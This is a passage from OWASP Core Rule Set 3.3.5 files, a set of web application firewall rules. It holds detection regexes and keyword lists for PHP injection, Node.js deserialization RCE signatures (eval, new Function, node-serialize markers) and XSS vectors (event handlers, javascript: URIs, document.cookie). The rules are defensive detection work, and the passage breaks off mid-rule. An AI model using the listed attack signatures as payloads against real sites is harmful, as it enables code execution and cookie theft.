https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. # # Note that after assemble, PHP function syntax pre/postfix is added to the Regexp::Assemble # output. Example: "@rx (?i)\bASSEMBLE_OUTPUT_HERE(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:i(?:s(?:_(?:in(?:t(?:eger)?|finite)|n(?:u(?:meric|ll)|an)|(?:calla|dou)ble|s(?:calar|tring)|f(?:inite|loat)|re(?:source|al)|l(?:ink|ong)|a(?:rray)?|object|bool)|set)|n(?:(?:clud|vok)e|t(?:div|val))|(?:mplod|dat)e|conv)|s(?:t(?:r(?:(?:le|sp)n|coll)|at)|(?:e(?:rializ|ttyp)|huffl)e|i(?:milar_text|zeof|nh?)|p(?:liti?|rintf)|(?:candi|ubst)r|y(?:mlink|slog)|o(?:undex|rt)|leep|rand|qrt)|f(?:ile(?:(?:siz|typ)e|owner|pro)|l(?:o(?:atval|ck|or)|ush)|(?:rea|mo)d|t(?:ell|ok)|unction|close|gets|stat|eof)|c(?:h(?:o(?:wn|p)|eckdate|root|dir|mod)|o(?:(?:(?:nsta|u)n|mpac)t|sh?|py)|lose(?:dir|log)|(?:urren|ryp)t|eil)|e(?:x(?:(?:trac|i)t|p(?:lode)?)|a(?:ster_da(?:te|ys)|ch)|r(?:ror_log|egi?)|mpty|cho|nd)|l(?:o(?:g(?:1[0p])?|caltime)|i(?:nk(?:info)?|st)|(?:cfirs|sta)t|evenshtein|trim)|d(?:i(?:(?:skfreespac)?e|r(?:name)?)|e(?:fined?|coct)|(?:oubleva)?l|ate)|r(?:e(?:(?:quir|cod|nam)e|adlin[ek]|wind|set)|an(?:ge|d)|ound|sort|trim)|m(?:b(?:split|ereg)|i(?:crotime|n)|a(?:i[ln]|x)|etaphone|y?sql|hash)|u(?:n(?:(?:tain|se)t|iqid|link)|s(?:leep|ort)|cfirst|mask)|a(?:s(?:(?:se|o)rt|inh?)|r(?:sort|ray)|tan[2h]?|cosh?|bs)|t(?:e(?:xtdomain|mpnam)|a(?:int|nh?)|ouch|ime|rim)|h(?:e(?:ader(?:s_(?:lis|sen)t)?|brev)|ypot|ash)|p(?:a(?:thinfo|ck)|r(?:intf?|ev)|close|o[sw]|i)|g(?:et(?:t(?:ext|ype)|date)|mdate)|o(?:penlog|ctdec|rd)|b(?:asename|indec)|n(?:atsor|ex)t|k(?:sort|ey)|quotemeta|wordwrap|virtual|join)(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" \ "id:933161,\ phase:2,\ block,\ capture,\ t:none,\ msg:'PHP Injection Attack: Low-Value PHP Function Call Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/3',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # # [ PHP Script Uploads: Superfluous extension ] # # Block file uploads with PHP related extensions (.php, .phps, .phtml, # .php5 etc) anywhere in the name, followed by a dot. # # Example: index.php.tmp # # Uploading of such files can lead to remote code execution if # Apache is configured with AddType and MultiViews, as Apache will # automatically do a filename match when the extension is unknown. # This configuration is fortunately not common in modern installs. # # Blocking these file names might lead to more false positives. # # Some AJAX uploaders use the nonstandard request headers X-Filename, # X_Filename, or X-File-Name to transmit the file name to the server; # scan these request headers as well as multipart/form-data file names. # # This rule is a stricter sibling of rule 933110. # SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.(?:php\d*|phtml)\..*$" \ "id:933111,\ phase:2,\ block,\ capture,\ t:none,t:lowercase,\ msg:'PHP Injection Attack: PHP Script File Upload Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/3',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" # [ PHP Closing Tag Found ] # # http://www.php.net/manual/en/language.basic-syntax.phptags.php # # This check was extracted from 933100 (paranoia level 1), since the # checked sequence '?>' commonly causes false positives. # See issue #654 for discussion. # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm ?>" \ "id:933190,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,\ msg:'PHP Injection Attack: PHP Closing Tag Found',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-php',\ tag:'platform-multi',\ tag:'attack-injection-php',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/3',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" # # -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) # # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-933-APPLICATION-ATTACK-PHP" modsecurity-crs-3.3.5/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf000066400000000000000000000076351446122515100240260ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" # # -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) # # [ Insecure unserialization / generic RCE signatures ] # # Libraries performing insecure unserialization: # - node-serialize: _$$ND_FUNC$$_ (CVE-2017-5941) # - funcster: __js_function # # See: # https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ # https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/ # # Some generic snippets used: # - function() { # - new Function( # - eval( # - String.fromCharCode( # # Last two are used by nodejsshell.py, # https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py # # As base64 is sometimes (but not always) used to encode serialized values, # use multiMatch and t:base64decode. # # Regexp generated from util/regexp-assemble/regexp-934100.data using Regexp::Assemble. # See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:(?:_(?:\$\$ND_FUNC\$\$_|_js_function)|(?:new\s+Function|\beval)\s*\(|String\s*\.\s*fromCharCode|function\s*\(\s*\)\s*{|this\.constructor)|module\.exports\s*=)" \ "id:934100,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:base64Decode,\ msg:'Node.js Injection Attack',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-javascript',\ tag:'platform-multi',\ tag:'attack-rce',\ tag:'attack-injection-nodejs',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" # # -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" # # -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" # # -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) # # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-934-APPLICATION-ATTACK-NODEJS" modsecurity-crs-3.3.5/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf000066400000000000000000001170241446122515100235110ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" # # -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) # # # -=[ Libinjection - XSS Detection ]=- # # Ref: https://github.com/client9/libinjection # Ref: https://speakerdeck.com/ngalbreath/libinjection-from-sqli-to-xss # # -=[ Targets ]=- # # 941100: PL1 : REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/| # REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent| # ARGS_NAMES|ARGS|XML:/* # # 941101: PL2 : REQUEST_HEADERS:Referer # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@detectXSS" \ "id:941100,\ phase:2,\ block,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'XSS Attack Detected via libinjection',\ logdata:'Matched Data: XSS data found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ XSS Filters - Category 1 ]=- # http://xssplayground.net23.net/xssfilter.html # script tag based XSS vectors, e.g., # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]*>[\s\S]*?" \ "id:941110,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'XSS Filter - Category 1: Script Tag Vector',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ XSS Filters - Category 2 ]=- # XSS vectors making use of event handlers like onerror, onload etc, e.g., # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\"'`;\/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]on[a-zA-Z]+[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=" \ "id:941120,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'XSS Filter - Category 2: Event Handler Vector',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ XSS Filters - Category 3 ]=- # # Regexp generated from util/regexp-assemble/regexp-941130.data using Regexp::Assemble. # To rebuild the regexp: # cd util/regexp-assemble # ./regexp-assemble.pl regexp-941130.data # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\S](?:!ENTITY\s+(?:\S+|%\s+\S+)\s+(?:PUBLIC|SYSTEM)|x(?:link:href|html|mlns)|data:text\/html|pattern\b.*?=|formaction|\@import|;base64)\b" \ "id:941130,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'XSS Filter - Category 3: Attribute Vector',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ XSS Filters - Category 4 ]=- # XSS vectors making use of javascript uri and tags, e.g.,

# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\b[^>]*?>[\s\S]*?|(?:=|U\s*?R\s*?L\s*?\()\s*?[^>]*?\s*?S\s*?C\s*?R\s*?I\s*?P\s*?T\s*?:)" \ "id:941140,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'XSS Filter - Category 4: Javascript URI Vector',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ NoScript XSS Filters ]=- # Ref: http://noscript.net/ # # [NoScript InjectionChecker] HTML injection # # Regexp generated from util/regexp-assemble/regexp-941160.data using Regexp::Assemble. # To rebuild the regexp: # cd util/regexp-assemble # ./regexp-assemble.pl regexp-941160.data # Note that after assemble an ignore case flag (i) is added to the to the Regexp::Assemble output: # Add ignore case flag between '?' and ':': "(?i:...)" # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)(?:on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|(?:peech|ound)(?:start|end)|u(?:ccess|spend|bmit)|croll|how)|m(?:o(?:z(?:(?:pointerlock|fullscreen)(?:change|error)|(?:orientation|time)change|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|b(?:e(?:fore(?:(?:(?:de)?activa|scriptexecu)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trieving|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ransition(?:cancel|end|run)|ime(?:update|out)|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom)|s(?:tyle|rc)|background|formaction|lowsrc|ping)[\s\x08]*?=|<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?(?:(?:a\W*?(?:n\W*?i\W*?m\W*?a\W*?t\W*?e|p\W*?p\W*?l\W*?e\W*?t|u\W*?d\W*?i\W*?o)|b\W*?(?:i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s|a\W*?s\W*?e|o\W*?d\W*?y)|i?\W*?f\W*?r\W*?a\W*?m\W*?e|o\W*?b\W*?j\W*?e\W*?c\W*?t|i\W*?m\W*?a?\W*?g\W*?e?|e\W*?m\W*?b\W*?e\W*?d|p\W*?a\W*?r\W*?a\W*?m|v\W*?i\W*?d\W*?e\W*?o|l\W*?i\W*?n\W*?k)[^>\w]|s\W*?(?:c\W*?r\W*?i\W*?p\W*?t|t\W*?y\W*?l\W*?e|e\W*?t[^>\w]|v\W*?g)|m\W*?(?:a\W*?r\W*?q\W*?u\W*?e\W*?e|e\W*?t\W*?a[^>\w])|f\W*?o\W*?r\W*?m))" \ "id:941160,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'NoScript XSS InjectionChecker: HTML Injection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # [NoScript InjectionChecker] Attributes injection # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:\W|^)(?:javascript:(?:[\s\S]+[=\\\(\[\.<]|[\s\S]*?(?:\bname\b|\\[ux]\d))|data:(?:(?:[a-z]\w+\/\w[\w+-]+\w)?[;,]|[\s\S]*?;[\s\S]*?\b(?:base64|charset=)|[\s\S]*?,[\s\S]*?<[\s\S]*?\w[\s\S]*?>))|@\W*?i\W*?m\W*?p\W*?o\W*?r\W*?t\W*?(?:\/\*[\s\S]*?)?(?:[\"']|\W*?u\W*?r\W*?l[\s\S]*?\()|\W*?-\W*?m\W*?o\W*?z\W*?-\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g[\s\S]*?:[\s\S]*?\W*?u\W*?r\W*?l[\s\S]*?\(" \ "id:941170,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'NoScript XSS InjectionChecker: Attribute Injection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # [Blacklist Keywords from Node-Validator] # https://raw.github.com/chriso/node-validator/master/validator.js # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm document.cookie document.write .parentnode .innerhtml window.location -moz-binding .*?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).*?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" \ "id:941190,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'IE XSS Filters - Attack Detected',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:<.*[:]?vmlframe.*?[\s/+]*?src[\s/+]*=)" \ "id:941200,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'IE XSS Filters - Attack Detected',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:j|&#x?0*(?:74|4A|106|6A);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:a|&#x?0*(?:65|41|97|61);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:v|&#x?0*(?:86|56|118|76);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:a|&#x?0*(?:65|41|97|61);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:s|&#x?0*(?:83|53|115|73);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:c|&#x?0*(?:67|43|99|63);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:r|&#x?0*(?:82|52|114|72);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:i|&#x?0*(?:73|49|105|69);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:p|&#x?0*(?:80|50|112|70);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:t|&#x?0*(?:84|54|116|74);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?::|&(?:#x?0*(?:58|3A);?|colon;)).)" \ "id:941210,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'IE XSS Filters - Attack Detected',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 